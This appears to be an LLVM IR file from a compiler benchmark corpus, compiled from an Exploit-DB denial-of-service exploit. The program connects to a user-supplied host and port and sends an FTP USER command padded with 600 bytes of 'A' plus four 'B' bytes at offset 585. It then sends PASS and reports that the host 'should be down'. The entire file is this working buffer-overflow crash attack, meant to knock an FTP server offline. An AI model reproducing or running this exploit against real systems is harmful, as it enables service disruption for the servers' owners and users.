; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/dos/extr_3127.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/dos/extr_3127.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.hostent = type { i64 }
%struct.sockaddr_in = type { i8, %struct.in_addr, i32, i32 }
%struct.in_addr = type { i32 }
%struct.sockaddr = type { i32 }

@.str = private unnamed_addr constant [27 x i8] c"[+] Usage: %s <ip> <port>\0A\00", align 1
@.str.1 = private unnamed_addr constant [29 x i8] c"[+] Connecting to %s:%s ... \00", align 1
@.str.2 = private unnamed_addr constant [41 x i8] c"Failed\0A[-] Could not init gethostbyname\0A\00", align 1
@PF_INET = common dso_local global i32 0, align 4
@SOCK_STREAM = common dso_local global i32 0, align 4
@.str.3 = private unnamed_addr constant [25 x i8] c"Failed\0A[-] Socket error\0A\00", align 1
@.str.4 = private unnamed_addr constant [54 x i8] c"Failed\0A[-] Sorry, cannot connect to %s:%s. Error: %i\0A\00", align 1
@.str.5 = private unnamed_addr constant [4 x i8] c"OK\0A\00", align 1
@.str.6 = private unnamed_addr constant [26 x i8] c"[+] Building payload ... \00", align 1
@.str.7 = private unnamed_addr constant [6 x i8] c"USER \00", align 1
@.str.8 = private unnamed_addr constant [4 x i8] c"\0D\0A\00\00", align 1
@.str.9 = private unnamed_addr constant [25 x i8] c"OK\0A[+] Sending USER ... \00", align 1
@.str.10 = private unnamed_addr constant [27 x i8] c"Failed\0A[-] Could not send\0A\00", align 1
@.str.11 = private unnamed_addr constant [6 x i8] c"PASS \00", align 1
@.str.12 = private unnamed_addr constant [22 x i8] c"[+] Sending PASS ... \00", align 1
@.str.13 = private unnamed_addr constant [25 x i8] c"[+] Host should be down\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca %struct.hostent*, align 8
  %7 = alloca %struct.sockaddr_in, align 4
  %8 = alloca i32, align 4
  %9 = alloca i32, align 4
  %10 = alloca [1024 x i8], align 16
  %11 = alloca [1024 x i8], align 16
  %12 = alloca i32, align 4
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  store i32 600, i32* %12, align 4
  %13 = load i32, i32* %4, align 4
  %14 = icmp ne i32 %13, 3
  br i1 %14, label %15, label %20

15:                                               ; preds = %2
  %16 = load i8**, i8*** %5, align 8
  %17 = getelementptr inbounds i8*, i8** %16, i64 0
  %18 = load i8*, i8** %17, align 8
  %19 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([27 x i8], [27 x i8]* @.str, i64 0, i64 0), i8* %18)
  store i32 1, i32* %3, align 4
  br label %130

20:                                               ; preds = %2
  %21 = call i32 (...) @WSACleanup()
  %22 = call i32 @MAKEWORD(i32 2, i32 0)
  %23 = call i32 @WSAStartup(i32 %22, i32* %8)
  %24 = load i8**, i8*** %5, align 8
  %25 = getelementptr inbounds i8*, i8** %24, i64 1
  %26 = load i8*, i8** %25, align 8
  %27 = load i8**, i8*** %5, align 8
  %28 = getelementptr inbounds i8*, i8** %27, i64 2
  %29 = load i8*, i8** %28, align 8
  %30 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([29 x i8], [29 x i8]* @.str.1, i64 0, i64 0), i8* %26, i8* %29)
  %31 = load i8**, i8*** %5, align 8
  %32 = getelementptr inbounds i8*, i8** %31, i64 1
  %33 = load i8*, i8** %32, align 8
  %34 = call %struct.hostent* @gethostbyname(i8* %33)
  store %struct.hostent* %34, %struct.hostent** %6, align 8
  %35 = icmp eq %struct.hostent* %34, null
  br i1 %35, label %36, label %38

36:                                               ; preds = %20
  %37 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([41 x i8], [41 x i8]* @.str.2, i64 0, i64 0))
  store i32 1, i32* %3, align 4
  br label %130

38:                                               ; preds = %20
  %39 = load i32, i32* @PF_INET, align 4
  %40 = load i32, i32* @SOCK_STREAM, align 4
  %41 = call i32 @socket(i32 %39, i32 %40, i32 0)
  store i32 %41, i32* %9, align 4
  %42 = icmp eq i32 %41, -1
  br i1 %42, label %43, label %45

43:                                               ; preds = %38
  %44 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([25 x i8], [25 x i8]* @.str.3, i64 0, i64 0))
  store i32 1, i32* %3, align 4
  br label %130

45:                                               ; preds = %38
  %46 = load i32, i32* @PF_INET, align 4
  %47 = getelementptr inbounds %struct.sockaddr_in, %struct.sockaddr_in* %7, i32 0, i32 3
  store i32 %46, i32* %47, align 4
  %48 = load i8**, i8*** %5, align 8
  %49 = getelementptr inbounds i8*, i8** %48, i64 2
  %50 = load i8*, i8** %49, align 8
  %51 = call i32 @atoi(i8* %50)
  %52 = call i32 @htons(i32 %51)
  %53 = getelementptr inbounds %struct.sockaddr_in, %struct.sockaddr_in* %7, i32 0, i32 2
  store i32 %52, i32* %53, align 4
  %54 = getelementptr inbounds %struct.sockaddr_in, %struct.sockaddr_in* %7, i32 0, i32 1
  %55 = load %struct.hostent*, %struct.hostent** %6, align 8
  %56 = getelementptr inbounds %struct.hostent, %struct.hostent* %55, i32 0, i32 0
  %57 = load i64, i64* %56, align 8
  %58 = inttoptr i64 %57 to %struct.in_addr*
  %59 = bitcast %struct.in_addr* %54 to i8*
  %60 = bitcast %struct.in_addr* %58 to i8*
  call void @llvm.memcpy.p0i8.p0i8.i64(i8* align 4 %59, i8* align 4 %60, i64 4, i1 false)
  %61 = getelementptr inbounds %struct.sockaddr_in, %struct.sockaddr_in* %7, i32 0, i32 0
  %62 = call i32 @memset(i8* %61, i8 signext 0, i32 8)
  %63 = load i32, i32* %9, align 4
  %64 = bitcast %struct.sockaddr_in* %7 to %struct.sockaddr*
  %65 = call i32 @connect(i32 %63, %struct.sockaddr* %64, i32 4)
  %66 = icmp eq i32 %65, -1
  br i1 %66, label %67, label %76

67:                                               ; preds = %45
  %68 = load i8**, i8*** %5, align 8
  %69 = getelementptr inbounds i8*, i8** %68, i64 1
  %70 = load i8*, i8** %69, align 8
  %71 = load i8**, i8*** %5, align 8
  %72 = getelementptr inbounds i8*, i8** %71, i64 2
  %73 = load i8*, i8** %72, align 8
  %74 = call i32 (...) @WSAGetLastError()
  %75 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([54 x i8], [54 x i8]* @.str.4, i64 0, i64 0), i8* %70, i8* %73, i32 %74)
  store i32 1, i32* %3, align 4
  br label %130

76:                                               ; preds = %45
  %77 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str.5, i64 0, i64 0))
  %78 = getelementptr inbounds [1024 x i8], [1024 x i8]* %10, i64 0, i64 0
  %79 = call i32 @memset(i8* %78, i8 signext 0, i32 1024)
  %80 = load i32, i32* %9, align 4
  %81 = getelementptr inbounds [1024 x i8], [1024 x i8]* %10, i64 0, i64 0
  %82 = call i32 @recv(i32 %80, i8* %81, i32 1024, i32 0)
  %83 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([26 x i8], [26 x i8]* @.str.6, i64 0, i64 0))
  %84 = getelementptr inbounds [1024 x i8], [1024 x i8]* %11, i64 0, i64 0
  %85 = load i32, i32* %12, align 4
  %86 = call i32 @memset(i8* %84, i8 signext 65, i32 %85)
  %87 = getelementptr inbounds [1024 x i8], [1024 x i8]* %11, i64 0, i64 0
  %88 = getelementptr inbounds i8, i8* %87, i64 585
  %89 = call i32 @memset(i8* %88, i8 signext 66, i32 4)
  %90 = getelementptr inbounds [1024 x i8], [1024 x i8]* %11, i64 0, i64 0
  %91 = call i32 @memcpy(i8* %90, i8* getelementptr inbounds ([6 x i8], [6 x i8]* @.str.7, i64 0, i64 0), i32 5)
  %92 = getelementptr inbounds [1024 x i8], [1024 x i8]* %11, i64 0, i64 0
  %93 = load i32, i32* %12, align 4
  %94 = sext i32 %93 to i64
  %95 = getelementptr inbounds i8, i8* %92, i64 %94
  %96 = call i32 @memcpy(i8* %95, i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str.8, i64 0, i64 0), i32 3)
  %97 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([25 x i8], [25 x i8]* @.str.9, i64 0, i64 0))
  %98 = load i32, i32* %9, align 4
  %99 = getelementptr inbounds [1024 x i8], [1024 x i8]* %11, i64 0, i64 0
  %100 = getelementptr inbounds [1024 x i8], [1024 x i8]* %11, i64 0, i64 0
  %101 = call i32 @strlen(i8* %100)
  %102 = call i32 @send(i32 %98, i8* %99, i32 %101, i32 0)
  %103 = icmp eq i32 %102, -1
  br i1 %103, label %104, label %106

104:                                              ; preds = %76
  %105 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([27 x i8], [27 x i8]* @.str.10, i64 0, i64 0))
  store i32 1, i32* %3, align 4
  br label %130

106:                                              ; preds = %76
  %107 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str.5, i64 0, i64 0))
  %108 = getelementptr inbounds [1024 x i8], [1024 x i8]* %10, i64 0, i64 0
  %109 = call i32 @memset(i8* %108, i8 signext 0, i32 1024)
  %110 = load i32, i32* %9, align 4
  %111 = getelementptr inbounds [1024 x i8], [1024 x i8]* %10, i64 0, i64 0
  %112 = call i32 @recv(i32 %110, i8* %111, i32 1024, i32 0)
  %113 = getelementptr inbounds [1024 x i8], [1024 x i8]* %11, i64 0, i64 0
  %114 = call i32 @memcpy(i8* %113, i8* getelementptr inbounds ([6 x i8], [6 x i8]* @.str.11, i64 0, i64 0), i32 5)
  %115 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([22 x i8], [22 x i8]* @.str.12, i64 0, i64 0))
  %116 = load i32, i32* %9, align 4
  %117 = getelementptr inbounds [1024 x i8], [1024 x i8]* %11, i64 0, i64 0
  %118 = getelementptr inbounds [1024 x i8], [1024 x i8]* %11, i64 0, i64 0
  %119 = call i32 @strlen(i8* %118)
  %120 = call i32 @send(i32 %116, i8* %117, i32 %119, i32 0)
  %121 = icmp eq i32 %120, -1
  br i1 %121, label %122, label %124

122:                                              ; preds = %106
  %123 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([27 x i8], [27 x i8]* @.str.10, i64 0, i64 0))
  store i32 1, i32* %3, align 4
  br label %130

124:                                              ; preds = %106
  %125 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str.5, i64 0, i64 0))
  %126 = load i32, i32* %9, align 4
  %127 = getelementptr inbounds [1024 x i8], [1024 x i8]* %10, i64 0, i64 0
  %128 = call i32 @recv(i32 %126, i8* %127, i32 1024, i32 0)
  %129 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([25 x i8], [25 x i8]* @.str.13, i64 0, i64 0))
  store i32 0, i32* %3, align 4
  br label %130

130:                                              ; preds = %124, %122, %104, %67, %43, %36, %15
  %131 = load i32, i32* %3, align 4
  ret i32 %131
}

declare dso_local i32 @printf(i8*, ...) #1

declare dso_local i32 @WSACleanup(...) #1

declare dso_local i32 @WSAStartup(i32, i32*) #1

declare dso_local i32 @MAKEWORD(i32, i32) #1

declare dso_local %struct.hostent* @gethostbyname(i8*) #1

declare dso_local i32 @socket(i32, i32, i32) #1

declare dso_local i32 @htons(i32) #1

declare dso_local i32 @atoi(i8*) #1

; Function Attrs: argmemonly nounwind willreturn
declare void @llvm.memcpy.p0i8.p0i8.i64(i8* noalias nocapture writeonly, i8* noalias nocapture readonly, i64, i1 immarg) #2

declare dso_local i32 @memset(i8*, i8 signext, i32) #1

declare dso_local i32 @connect(i32, %struct.sockaddr*, i32) #1

declare dso_local i32 @WSAGetLastError(...) #1

declare dso_local i32 @recv(i32, i8*, i32, i32) #1

declare dso_local i32 @memcpy(i8*, i8*, i32) #1

declare dso_local i32 @send(i32, i8*, i32, i32) #1

declare dso_local i32 @strlen(i8*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
